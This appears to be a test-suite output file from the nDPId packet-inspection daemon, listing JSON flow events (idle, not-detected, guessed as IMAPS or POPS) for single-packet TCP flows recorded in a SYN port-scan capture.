+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"POPS","breed":"Safe","category":"Email"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"POPS","breed":"Safe","category":"Email"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 